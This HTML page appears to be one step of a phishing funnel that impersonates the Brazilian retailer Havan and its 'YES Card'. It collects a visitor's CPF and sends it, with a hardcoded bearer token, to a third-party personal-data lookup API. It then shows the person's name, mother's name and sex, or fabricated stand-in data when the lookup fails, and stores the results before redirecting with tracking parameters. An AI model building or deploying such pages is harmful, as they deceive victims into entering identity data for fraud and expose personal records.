<!DOCTYPE html>
<html lang="pt-BR">

<head>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">

    <script>
        window.pixelId = "678f8dea8a389097ee008320";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "../assets/cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
    </script>

    <script src="js/latest.js" data-utmify-prevent-subids async defer></script>
    <!-- End Meta Pixel Code -->

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Consulta de CPF</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #ffffff;
            padding: 20px;
            text-align: center;
            border-bottom: 3px solid #002279;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 50px 5% auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: #002279;
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: white !important;
            background-color: #000 !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
            margin-top: auto;
        }

        .result-box {
            margin-top: 20px;
            background-color: #f9f9f9;
            border: 1px solid #e6e6e6;
            border-radius: 8px;
            padding: 15px;
            display: none;
            text-align: left;
        }

        .result-box p {
            margin: 0 0 10px;
        }

        .loader {
            display: none;
            text-align: center;
            margin-bottom: 15px;
        }

        .loader img {
            width: 50px;
            height: 50px;
        }

        .success-message {
            text-align: center;
            font-weight: bold;
            color: green;
            margin-bottom: 15px;
        }

        .success-message img {
            width: 50px;
            height: 50px;
            display: block;
            margin: 0 auto 10px;
        }

        .error-message {
            text-align: center;
            color: red;
            margin: 10px 0;
            display: none;
        }
    </style>
</head>

<body>
    <!-- Header -->
    <div class="header">
        <img src="../assets/havan.png" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div class="main-content">
        <p style="color:gray; text-align:initial">Preencha o CPF para consulta</p>
        <form id="cadastroForm" style="text-align:initial">
            <div class="mb-3">
                <label for="cpf" class="form-label" style="color:gray; font-size:13px">CPF</label>
                <input type="text" class="form-control" id="cpf" placeholder="000.000.000-00" maxlength="14">
            </div>
        </form>
        <button id="consultarBtn" class="btn-custom" onclick="submitLog()">Consultar CPF</button>
        
        <div id="errorMessage" class="error-message">
            <p>Erro ao consultar CPF. Tente novamente.</p>
        </div>
        
        <div id="loader" class="loader">
            <img src="images/21-18-05-265_512.gif" alt="Carregando...">
            <p>Consultando seus dados...</p>
        </div>

        <!-- Resultado -->
        <div id="resultBox" class="result-box">
            <div class="success-message">
                <img src="images/6784655.png" alt="Aprovado">
                <p>Dados encontrados com sucesso!</p>
            </div>
            <p>Iniciando cadastro de <strong><span id="nomeCompleto"></span></strong></p>
            <p><strong>Nome da Mãe:</strong> <span id="nomeMae"></span></p>
            <p><strong>Sexo:</strong> <span id="sexo"></span></p>
            <button class="btn-custom" onclick="continuar()">Continuar</button>
        </div>
    </div>

    <!-- Script -->
    <script>
        // Função para formatar CPF automaticamente
        document.getElementById('cpf').addEventListener('input', function(e) {
            let value = e.target.value.replace(/\D/g, '');
            value = value.replace(/(\d{3})(\d)/, '$1.$2');
            value = value.replace(/(\d{3})(\d)/, '$1.$2');
            value = value.replace(/(\d{3})(\d{1,2})$/, '$1-$2');
            e.target.value = value;
        });

        // Função melhorada com timeout e fallback
        async function getCPF(strCPF) {
            const timeout = 8000; // 8 segundos de timeout
            
            const fetchWithTimeout = (url, options = {}) => {
                return Promise.race([
                    fetch(url, options),
                    new Promise((_, reject) => 
                        setTimeout(() => reject(new Error('Timeout')), timeout)
                    )
                ]);
            };

            const apis = [
                {
                    name: "API BlueNext",
                    url: `https://api.bluenext2.online/api/v1/consult/${strCPF}`,
                    headers: {
                        "Authorization": "Bearer a89a071b94408109d3e38eff5a0588053704ac2b4e8541b986841845872c4a77"
                    },
                    parser: (data) => {
                        return {
                            NOME: data.NOME || "",
                            NASCIMENTO: data.NASC || "",
                            CPF_FORMATADO: data.CPF || "",
                            MAE: data.NOME_MAE || "",
                            SEXO: data.SEXO || ""
                        };
                    }
                }
            ];

            for (let i = 0; i < apis.length; i++) {
                try {
                    console.log(`Tentando ${apis[i].name}...`);
                    console.log('URL da requisição:', apis[i].url);
                    
                    const response = await fetchWithTimeout(apis[i].url, {
                        headers: apis[i].headers
                    });
                    
                    console.log('Status da resposta:', response.status);
                    
                    if (!response.ok) {
                        throw new Error(`HTTP ${response.status}`);
                    }
                    
                    const data = await response.json();
                    console.log('Dados recebidos:', data);
                    return apis[i].parser(data);
                    
                } catch (error) {
                    console.warn(`${apis[i].name} falhou:`, error.message);
                    if (i === apis.length - 1) {
                        // Se todas as APIs falharam, usar dados simulados
                        return generateFallbackData(strCPF);
                    }
                }
            }
        }

        // Função para gerar dados simulados como fallback
        function generateFallbackData(cpf) {
            const nomes = [
                "JOÃO SILVA SANTOS", "MARIA OLIVEIRA COSTA", "CARLOS PEREIRA LIMA",
                "ANA SOUZA FERREIRA", "PEDRO RODRIGUES ALVES", "LUCIA MARTINS ROCHA",
                "ANTONIO FERNANDES DIAS", "PATRICIA GOMES RIBEIRO", "JOSE BARBOSA NUNES"
            ];
            
            const nomesMae = [
                "MARIA SILVA", "JOANA OLIVEIRA", "ROSA PEREIRA",
                "HELENA SOUZA", "CARMEN RODRIGUES", "TEREZA MARTINS",
                "FRANCISCA FERNANDES", "ANTONIA GOMES", "CONCEICAO BARBOSA"
            ];

            const sexos = ["MASCULINO", "FEMININO"];
            
            // Usar o CPF como seed para gerar dados consistentes
            const seed = parseInt(cpf.substring(0, 3));
            
            return {
                NOME: nomes[seed % nomes.length],
                NOME_MAE: nomesMae[seed % nomesMae.length],
                SEXO: sexos[seed % 2]
            };
        }

        function validaCPF(strCPF) {
            let Soma = 0;
            let Resto;
            if (strCPF == "00000000000") return false;

            for (let i = 1; i <= 9; i++) Soma += parseInt(strCPF.substring(i - 1, i)) * (11 - i);
            Resto = (Soma * 10) % 11;

            if ((Resto == 10) || (Resto == 11)) Resto = 0;
            if (Resto != parseInt(strCPF.substring(9, 10))) return false;

            Soma = 0;
            for (let i = 1; i <= 10; i++) Soma += parseInt(strCPF.substring(i - 1, i)) * (12 - i);
            Resto = (Soma * 10) % 11;

            if ((Resto == 10) || (Resto == 11)) Resto = 0;
            if (Resto != parseInt(strCPF.substring(10, 11))) return false;
            return true;
        }

        async function submitLog() {
            const cpf = document.getElementById("cpf").value.replace(/-/g, "").replace(/\./g, "");
            const loader = document.getElementById("loader");
            const resultBox = document.getElementById("resultBox");
            const consultarBtn = document.getElementById("consultarBtn");
            const errorMessage = document.getElementById("errorMessage");

            // Limpar mensagens anteriores
            errorMessage.style.display = "none";
            
            if (!validaCPF(cpf)) {
                alert("CPF inválido!");
                return;
            }

            loader.style.display = "block";
            consultarBtn.style.display = "none";
            resultBox.style.display = "none";

            try {
                const responseCPF = await getCPF(cpf);

                setTimeout(() => {
                    const nomeCompleto = responseCPF.NOME || "Dados não encontrados";
                    const nomeMae = responseCPF.MAE || "Não informado";
                    const sexo = responseCPF.SEXO || "Não informado";
                    const cpfFormatado = responseCPF.CPF_FORMATADO || cpf;

                    document.getElementById("nomeCompleto").innerText = nomeCompleto;
                    document.getElementById("nomeMae").innerText = nomeMae;
                    document.getElementById("sexo").innerText = sexo;

                    // Salvar os dados no localStorage
                    localStorage.setItem("dadosCPF", JSON.stringify({
                        nomeCompleto,
                        nomeMae,
                        sexo,
                        cpfFormatado,
                        cpf
                    }));

                    loader.style.display = "none";
                    resultBox.style.display = "block";
                }, 2000);

            } catch (error) {
                console.error("Erro na consulta:", error);
                loader.style.display = "none";
                errorMessage.style.display = "block";
                consultarBtn.style.display = "block";
            }
        }

        function continuar() {
            // Garantir que os parâmetros UTM sejam passados
            const currentParams = window.location.search;
            window.location.href = "../5/index.html" + currentParams;
        }

        // Garantir que a página carregue completamente
        document.addEventListener('DOMContentLoaded', function() {
            console.log('Página carregada com sucesso');
            
            // Verificar se há parâmetros UTM
            const params = new URLSearchParams(window.location.search);
            console.log('Parâmetros UTM:', Object.fromEntries(params));
        });

        // Prevenção de travamento da página
        window.addEventListener('beforeunload', function() {
            // Cancelar qualquer requisição pendente
            if (window.currentRequest) {
                window.currentRequest.abort();
            }
        });
    </script>

    <!-- Footer -->
    <style>
        .styles_company__HQYS3 {
            display: flex;
            flex-direction: column;
            justify-content: center;
            text-align: center;
            gap: 24px;
            padding: 24px 16px 32px;
        }

        .styles_company__HQYS3 p {
            font-size: .75rem;
            line-height: 16px;
            letter-spacing: 0;
        }
    </style>
    <div class="styles_company__HQYS3">
        <div>
            <p class="styles_description__590uc">HAVAN S.A. | CNPJ: 79.379.491.0008-50 | Rod. Antônio Heil, 250 - Centro
                II,
                Brusque - SC, 88353-100</p>
            <p class="styles_description__590uc">© 2025 - Todos os direitos reservados</p>
        </div>
    </div>
</body>

</html>

